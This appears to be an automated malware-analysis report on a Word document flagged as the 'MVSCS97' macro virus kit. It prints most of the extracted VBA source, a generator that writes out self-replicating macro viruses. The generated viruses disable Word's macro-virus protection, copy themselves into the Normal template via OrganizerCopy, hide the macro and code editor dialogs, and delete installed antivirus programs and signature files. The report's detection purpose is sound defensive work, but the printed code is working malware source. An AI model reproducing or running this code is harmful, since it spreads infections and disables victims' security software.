MALICIOUS
Risk Score: 256
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file exhibits characteristics of a legacy WordBasic macro virus and contains VBA macros, specifically AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening. The presence of 'MVSCS97 Word 97 Macro Virus Kit Alevirus&RickCrazy' in the script suggests it is part of a known macro virus kit. The primary function appears to be the execution of embedded malicious macros.
Heuristics (6)
- ClamAV: Doc.Trojan.MVSCS-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.MVSCS-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family, self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Print #1, " .VirusProtection = False"
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE): Auto_Close macro
  Matched line in script: Print #1, "'AutoClose macro"
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42366 bytes |

SHA-256: 3263d1b53e17db9f1079d1929a19e8dc2a27d4674c681b69da2dc6d63c00bcaa
Detection: ClamAV: Doc.Trojan.MVSCS-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Alevirus98"
Public VirusName As String
Public SourceFileName As String
Public NumberOfMacros As String
Sub AutoOpen()
On Error Resume Next
Application.Caption = "MVSCS97 Word 97 Macro Virus Kit Alevirus&RickCrazy"
frmStartForm.Show
End Sub
Sub FileTemplates()
End Sub
Sub ToolsCustomize()
End Sub
Sub FileNew()
End Sub
Sub EditCut()
End Sub
Sub EditCopy()
End Sub
Sub EditPaste()
End Sub
Sub EditPasteSpecial()
End Sub
Sub EditClear()
End Sub
Sub EditSelectAll()
End Sub
Sub EditFind()
End Sub
Sub EditReplace()
End Sub
Sub EditGoTo()
End Sub
Sub ToolsOptions()
End Sub
Sub InsertObject()
End Sub
Sub InsertFile()
End Sub
Sub InsertHyperlink()
End Sub
Sub InsertCaption()
End Sub
Sub InsertFootNote()
End Sub
Sub InsertBreak()
End Sub
Sub TableSort()
End Sub
Sub TableFormula()
End Sub
Sub FilePrint()
End Sub
Sub FilePrintPreview()
End Sub
Sub FileVersions()
End Sub
Sub FileProperties()
End Sub
Sub ToolsWordCount()
End Sub
Sub ToolsMacro()
End Sub
Sub ViewVBCode()
End Sub
Attribute VB_Name = "frmStartForm"
Attribute VB_Base = "0{E060CCC5-D97B-11D1-BE00-444553540000}{E060CC62-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmStartForm.Hide
frmVirusSourceName.Show
End Sub
Private Sub Image1_Click()
End Sub
Private Sub Label1_Click()
End Sub
Private Sub SpinButton1_Change()
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "frmVirusSourceName"
Attribute VB_Base = "0{E060CC8C-D97B-11D1-BE00-444553540000}{E060CC6A-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
On Error GoTo VaCa
If txtVirusName.Text = "" Then
MsgBox "Coloque um nome para seu Virus!!!.", vbOKOnly, "MVSCS97"
txtboxnotfilled = 1
End If
If txtSourceFileName.Text = "" Then
MsgBox "Coloque um nome para o Fonte!!!.", vbOKOnly, "MVSCS97"
txtboxnotfilled = 1
End If
If opttxt.Value = False And optBAS.Value = False Then
MsgBox "Escolha a extenção do Arquivo *.TXT ou *.BAS???", vbOKOnly, "MVSCS97"
txtboxnotfilled = 1
End If
If txtboxnotfilled = 1 Then GoTo VaCa
If opttxt.Value = True Then
txtSourceFileName = txtSourceFileName & ".txt"
End If
If optBAS.Value = True Then
txtSourceFileName = txtSourceFileName & ".bas"
End If
VirusName = txtVirusName.Text
SourceFileName = txtSourceFileName.Text
frmVirusSourceName.Hide
frmVirusBody.Show
VaCa:
End Sub
Private Sub Frame1_Click()
End Sub
Private Sub txtSourceFileName_Change()
End Sub
Private Sub txtVirusName_Change()
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "frmVirusBody"
Attribute VB_Base = "0{E060CC90-D97B-11D1-BE00-444553540000}{E060CC6C-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
On Error GoTo ByeBye
If chkbStealth.Value = True Then
frmStealth.Show
End If
If chkbRetro.Value = True Then
frmRetro.Show
End If
If chkbPayload.Value = True Then
frmPayload.Show
End If
frmVirusBody.Hide
frmMacros.Show
ByeBye:
End Sub
Private Sub UserForm_Initialize()
On Error GoTo ByeBye
lblVirusName = VirusName
lblSourceFileName = SourceFileName
ByeBye:
End Sub
Attribute VB_Name = "frmStealth"
Attribute VB_Base = "0{E060CC94-D97B-11D1-BE00-444553540000}{E060CC6E-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdOK_Click()
frmStealth.Hide
End Sub
Private Sub UserForm_Click()
End Sub
Private Sub UserForm_MouseMove(ByVal Button As Integer, ByVal Shift As Integer, ByVal X As Single, ByVal Y As Single)
End Sub
Attribute VB_Name = "frmRetro"
Attribute VB_Base = "0{E060CC98-D97B-11D1-BE00-444553540000}{E060CC70-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
End Sub
Private Sub chkbPCCillan95_Click()
End Sub
Private Sub cmdOK_Click()
frmRetro.Hide
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "frmMakeVirus"
Attribute VB_Base = "0{E060CCBC-D97B-11D1-BE00-444553540000}{E060CC82-D97B-11D1-BE00-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub cmdExit_Click()
On Error Resume Next
Tasks.ExitWindows
End Sub
Private Sub cmdMAKE_Click()
On Error GoTo ByeBye
Open SourceFileName For Output As #1
Print #1, "'Por favor não tire a legenda!"
Print #1, "'Gerado por MVSCS97 Word 97 Macro Virus KIT 1998!"
Print #1, "'AlevirusS>C>S 1998 Isto é para todos os Virus Makers do Brasil!"
Print #1, "'Virus Nome: " & VirusName
Print #1,
If frmMacros.chkbAutoOpen = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoOpen macro"
Print #1, "'Executa quando o documento for Aberto"
Print #1, "'------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub AutoOpen()"
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbAutoClose = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'AutoClose macro"
Print #1, "'Executa quando o documento for fechado"
Print #1, "'------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub AutoClose()"
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSaveAs = True Then
Print #1,
Print #1, "'-----------------------------------------------------------------------"
Print #1, "'ArquivoSalvarComo macro"
Print #1, "'Executa quando o usuario selecionar Arquivo Salvar Como no Menu do Word"
Print #1, "'-----------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub FileSaveAs()"
Print #1,
Print #1, " Dialogs(wdDialogFileSaveAs).Show"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileSave = True Then
Print #1,
Print #1, "'-------------------------------------------------------------------"
Print #1, "'ArquivoSalvar macro"
Print #1, "'Executa quando o usuario selecionar Arquivo Salvar no Menu do Word "
Print #1, "'-------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub FileSave()"
Print #1,
Print #1, " ActiveDocument.Save"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFilePrint = True Then
Print #1,
Print #1, "'---------------------------------------------------------------------"
Print #1, "'ArquivoImprimir macro"
Print #1, "'Executa quando o usuario selecionar Arquivo Imprimir no Menu do Word"
Print #1, "'---------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub FilePrint()"
Print #1,
Print #1, " Dialogs(wdDialogFilePrint).Show"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbEditFind = True Then
Print #1,
Print #1, "'--------------------------------------------------------------------"
Print #1, "'EditarLocalizar macro"
Print #1, "'Executa quando o usuario selecionar Editar Localizar no Menu do Word"
Print #1, "'--------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub EditFind()"
Print #1,
Print #1, " Dialogs(wdDialogEditFind).Show"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbToolsWordCount = True Then
Print #1,
Print #1, "'--------------------------------------------------------------------------------"
Print #1, "'FerramantasContarPalavras macro"
Print #1, "'Executa quando o usuario selecionar FerramantasContarPalavras no Menu do Word"
Print #1, "'--------------------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub ToolsWordCount()"
Print #1,
Print #1, " Dialogs(wdDialogToolsWordCount).Show"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbAutoExit = True Then
Print #1,
Print #1, "'---------------------------------------------------------------------------------"
Print #1, "'AutoExit macro"
Print #1, "'Executa Automaticamente quando o usuario sai do Word"
Print #1, "'---------------------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub AutoExit()"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
End If
If frmMacros.chkbFileNew = True Then
Print #1,
Print #1, "'------------------------------------------------------------------"
Print #1, "'ArquivoNovo macro"
Print #1, "'Executa quando o usuario selecionar Arequivo Novo no Menu do Word"
Print #1, "'------------------------------------------------------------------"
Print #1, "Attribute VB_Name = """ & VirusName & """"
Print #1, "Sub PuTa()"
Print #1,
Print #1, " On Error Resume Next"
Print #1,
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, " Payload"
Print #1,
End If
Print #1, "With Options"
Print #1, " .ConfirmConversions = False"
Print #1, " .VirusProtection = False"
Print #1, " .SaveNormalPrompt = False"
Print #1, " End With"
Print #1, " ActiveDocument.ReadOnlyRecommended = False"
Print #1, " n343091879 = 0"
Print #1,
Print #1, " set Unit187918734301 = MacroContainer"
Print #1, " If Unit187918734301 = NormalTemplate Then n343091879 = 1"
Print #1,
Print #1, " If n343091879 = 1 Then r4g34304 = NormalTemplate.FullName Else r4g34304 = ActiveDocument.FullName"
Print #1, " If n343091879 = 1 Then ki91879 = ActiveDocument.FullName Else ki91879 = NormalTemplate.FullName"
Print #1, " Application.OrganizerCopy Source:=r4g34304, Destination:=ki91879, Name:=""" & VirusName & """, Object:=wdOrganizerObjectProjectItems"
Print #1, " If n343091879 = 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument"
Print #1, " If n343091879 = 0 Then"
Print #1,
Print #1, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Print #1, " End If"
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, " Retro"
Print #1,
End If
Print #1, "End Sub"
Print #1,
Print #1, "Sub FileNew()"
Print #1, "On Error Resume Next"
Print #1, "Call PuTa"
Print #1, "Dialogs(wdDialogFileNew).Show"
Print #1, "Skip = 1"
Print #1, "Call PuTa"
Print #1, "End Sub"
End If
If frmStealth.chkbToolsMacro = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FerramentasMacro macro"
Print #1, "'Usado para esconder Caixa de Ferramentas Macro"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub ToolsMacro()"
Print #1,
Print #1, "End Sub"
Print #1,
End If
If frmStealth.chkbViewVBCode = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'VisualBasicCodigo macro"
Print #1, "'Usado para esconder a Caixa do VisualBasic "
Print #1, "'------------------------------------------------------------"
Print #1, "Sub ViewVBCode()"
Print #1,
Print #1, "End Sub"
Print #1,
End If
If frmStealth.chkbToolsCustomize = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'FerramentasPersonalizar macro"
Print #1, "'Usado para esconder a Caixa Ferramentas Personalizar "
Print #1, "'------------------------------------------------------------"
Print #1, "Sub ToolsCustomize()"
Print #1,
Print #1, "End Sub"
Print #1,
End If
If frmStealth.chkbFileTemplates = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'ArquivoModelos macro"
Print #1, "'Usado para esconder a caixa de Dialogo Arwquivos Modelo "
Print #1, "'------------------------------------------------------------"
Print #1, "Sub FileTemplates()"
Print #1,
Print #1, "End Sub"
Print #1,
End If
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'Retro macro"
Print #1, "'Deleta varios Anti-Virus Muito Populares"
Print #1, "'------------------------------------------------------------"
Print #1, "Sub Retro()"
Print #1, " On Error Resume Next"
End If
If frmRetro.chkbAVP = True Then
Print #1, " Kill ""C:\Program Files\AntiViral Toolkit Pro\Avp32.exe"""
Print #1, " Kill ""C:\progra~1\Antivi~1\Avp32.exe"""
Print #1, " Kill ""C:\Program Files\AntiViral Toolkit Pro\*.avc"""
Print #1, " Kill ""C:\progra~1\antivi~1\*.avc"""
End If
If frmRetro.chkbFMacro = True Then
Print #1, " Kill ""C:\f-macro\f-macro.exe"""
Print #1, " Kill ""C:\f-prot~1\f-macro.exe"""
End If
If frmRetro.chkbFProt95 = True Then
Print #1, " Kill ""C:\Program Files\Command Software\F-PROT95\Sign.def"""
